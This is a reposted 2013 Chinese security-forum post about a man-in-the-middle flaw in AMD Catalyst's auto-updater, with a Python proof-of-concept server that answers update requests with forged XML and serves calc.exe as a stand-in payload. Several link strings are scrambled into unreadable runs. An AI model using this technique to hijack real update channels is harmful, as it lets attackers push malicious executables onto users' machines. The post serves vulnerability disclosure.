[转帖]AMD 显卡催化剂自动更新程序漏洞-茶余饭后-看雪-安全社区|安全招聘|kanxue.com

[转帖]AMD 显卡催化剂自动更新程序漏洞

发表于: 2013-4-28 11:59 1227

[转帖]AMD 显卡催化剂自动更新程序漏洞

sgby

2013-4-28 11:59

1227

在2013年1月17日，AMD发布了AMD催化剂13.1，随后宣布删除自动更新的功能，当时AMD表示是因为自动更新里面存在安全问题，近日，网络爆出了该安全问题的详细信息，是因为可以利用中间人攻击劫持自动更新的请求。
漏洞存是由于：
二进制程序的下载是通过HTTP来完成的。
AMD执行前已签订了未通过验证。

这意味着，可以利用中间人攻击截获AMD技术支持网站的请求，并重定向到攻击者特制的应用页面或程序。
POC
import SimpleHTTPServer
import SocketServer

xml = """<?xml version="1.0" encoding="utf-8"?>
<list>
<Catalyst-Driver-Files>
      <Title>Catalyst Software Suite with .NET 4 Support</Title>
      <DriverCategory>Full Catalyst Software Suite (Recommended)</DriverCategory>
      <DriverLanguage>;#All;#</DriverLanguage>
      <DriverProductType>;#1-Radeon;#3-Integrated;#18-AIW_HD;#</DriverProductType>
      <FileSize>184 MB</FileSize>
      <OSType>;#Windows Vista - 64-Bit Edition;#Windows 7 - 64-Bit Edition;#</OSType>
      <ReleaseDate>2012-10-22T00:00:00-05:00</ReleaseDate>
      <RevisionNumber>12.42</RevisionNumber>
      <RollupSortOrder>15</RollupSortOrder>
      <TextMultiple1>
      </TextMultiple1>
      <TextSingle1>92dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6K6u0Q4x3X3g2S2N6r3W2Q4x3X3g2U0L8$3#2Q4x3V1k6V1M7X3W2$3k6i4u0K6i4K6u0r3x3e0u0Q4x3X3b7I4x3q4)9#2k6Y4k6A6M7%4c8S2i4K6g2X3N6$3W2F1y4#2)9#2k6Y4N6A6L8U0S2Q4y4h3j5$3y4q4)9#2k6X3c8V1i4K6g2X3j5$3y4U0i4K6g2X3N6$3S2I4L8q4)9#2k6X3&6W2N6o6c8Q4x3X3g2W2P5r3g2Q4x3U0k6D9N6q4)9K6b7W2)9J5c8W2c8W2P5s2c8e0K9h3&6Y4L8r3f1I4i4K6t1$3k6%4c8Q4x3@1t1`.
      <TechDownloadGPUSubtype>Driver</TechDownloadGPUSubtype>
      <ContentType>GraphicsDriverFile</ContentType>
      <DriverVersionSupported>;#12.42;#</DriverVersionSupported>
      <ID>956</ID>
      <Modified>2012-10-22T21:30:52-05:00</Modified>
      <Created>2012-10-22T21:30:52-05:00</Created>
      <Author>System Account</Author>
      <Editor>System Account</Editor>
      <_UIVersionString>1.0</_UIVersionString>
      <Attachments>0</Attachments>
      <TitleCN>Catalyst Software Suite</TitleCN>
      <TitleBR>Catalyst Software Suite</TitleBR>
      <TitleDE>Catalyst Software Suite</TitleDE>
      <TitleFR>Catalyst Software Suite</TitleFR>
      <TitleIT>Catalyst Software Suite</TitleIT>
      <TitleLA>Catalyst Software Suite</TitleLA>
      <DescriptionCN>
      </DescriptionCN>
      <DescriptionBR>
      </DescriptionBR>
      <DescriptionDE>
      </DescriptionDE>
      <DescriptionFR>
      </DescriptionFR>
      <DescriptionIT>
      </DescriptionIT>
      <DescriptionLA>
      </DescriptionLA>
      <TitleKR>(Catalyst Software Suite)</TitleKR>
      <DescriptionKR>
      </DescriptionKR>
      <LinkTitleNoMenu>Catalyst Software Suite with .NET 4 Support</LinkTitleNoMenu>
      <LinkTitle>Catalyst Software Suite with .NET 4 Support</LinkTitle>
</Catalyst-Driver-Files>
</list>
"""

class ExploitHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
      if "catalystxml" in self.path:
         self.send_response(200)
         self.send_header('Content-type','text/xml')
         self.end_headers()
         self.wfile.write(xml)
         return
      elif ".exe" in self.path:
         self.send_response(200)
         self.send_header('Content-type','application/octet-stream')
         self.end_headers()
         f = open(r"C:\Windows\System32\calc.exe", "rb")
         self.wfile.write(f.read())
         f.close()
         return

httpd = SocketServer.ThreadingTCPServer(('0.0.0.0', 80), ExploitHandler)
httpd.serve_forever()
这个脚本是指向amd.com，0a4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4E0k6q4)9J5k6h3y4G2L8g2!0q4c8W2!0n7b7#2)9^5b7%4N6%4N6#2)9J5k6h3q4@1K9g2)9J5k6h3y4G2L8g2!0q4y4g2)9&6x3W2)9^5b7%4N6%4N6K6u0Q4x3X3g2S2N6r3W2Q4x3X3g2U0L8$3#2Q4c8f1k6Q4b7V1y4Q4z5o6S2m8e0f1c8Q4c8e0c8Q4b7U0S2Q4z5p5c8Q4c8e0g2Q4b7f1c8Q4z5e0S2Q4c8e0g2Q4z5f1y4Q4b7e0S2Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0g2Q4z5f1k6Q4z5f1k6Q4c8e0g2Q4z5e0m8Q4z5p5c8Q4c8f1k6Q4b7V1y4Q4z5o6W2Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0c8Q4b7V1c8Q4b7e0m8Q4c8e0c8Q4b7V1y4Q4z5f1q4Q4c8e0S2Q4b7e0N6Q4z5o6u0Q4c8e0g2Q4b7f1k6Q4z5f1k6Q4c8e0g2Q4z5o6S2Q4b7U0m8Q4c8f1k6Q4b7V1y4Q4z5p5y4m8e0f1c8Q4c8e0k6Q4z5e0S2Q4b7V1g2Q4c8e0g2Q4z5p5c8Q4b7e0q4Q4c8e0g2Q4z5o6u0Q4b7f1y4Q4c8e0g2Q4z5p5y4Q4z5e0k6Q4c8e0g2Q4z5o6W2Q4z5o6u0Q4c8e0g2Q4z5e0m8Q4b7f1k6Q4c8e0g2Q4z5p5q4Q4b7e0S2Q4c8e0k6Q4z5f1u0Q4b7U0c8Q4c8e0k6Q4z5e0k6Q4b7U0m8Q4c8e0g2Q4z5p5q4Q4z5f1k6Q4c8e0S2Q4z5o6y4Q4b7V1c8Q4c8e0c8Q4b7U0W2Q4z5p5u0Q4c8e0g2Q4z5e0m8Q4z5p5g2Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4b7f1g2Q4z5o6y4Q4c8e0c8Q4b7V1y4Q4z5f1q4Q4c8e0k6Q4z5p5k6Q4z5e0m8Q4c8e0N6Q4b7e0c8Q4b7V1q4Q4c8e0c8Q4b7V1c8Q4b7e0m8Q4c8e0k6Q4z5f1u0Q4b7U0c8Q4c8e0k6Q4z5e0k6Q4b7U0m8Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0W2Q4b7e0W2Q4b7U0q4Q4c8e0g2Q4z5p5q4Q4b7e0S2Q4c8e0N6Q4b7e0S2Q4z5p5u0Q4c8e0g2Q4b7V1q4Q4z5p5k6Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0c8Q4b7U0S2Q4z5p5u0Q4c8e0S2Q4b7V1c8Q4b7V1c8Q4c8e0g2Q4b7U0W2Q4b7U0k6Q4c8e0k6Q4z5o6W2Q4b7e0N6Q4c8e0S2Q4b7e0q4Q4z5p5y4U0j5h3I4U0i4K6u0W2k6i4S2W2i4@1f1$3i4K6V1$3i4K6R3%4i4@1f1@1i4@1u0n7i4@1t1$3i4@1f1K6i4K6R3H3i4K6R3J5
许多应用程序可能都存在该漏洞，老外研究开发了一款工具EvilGrade，可以查找这些安全问题。

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

#资讯

收藏・0

免费・0

支持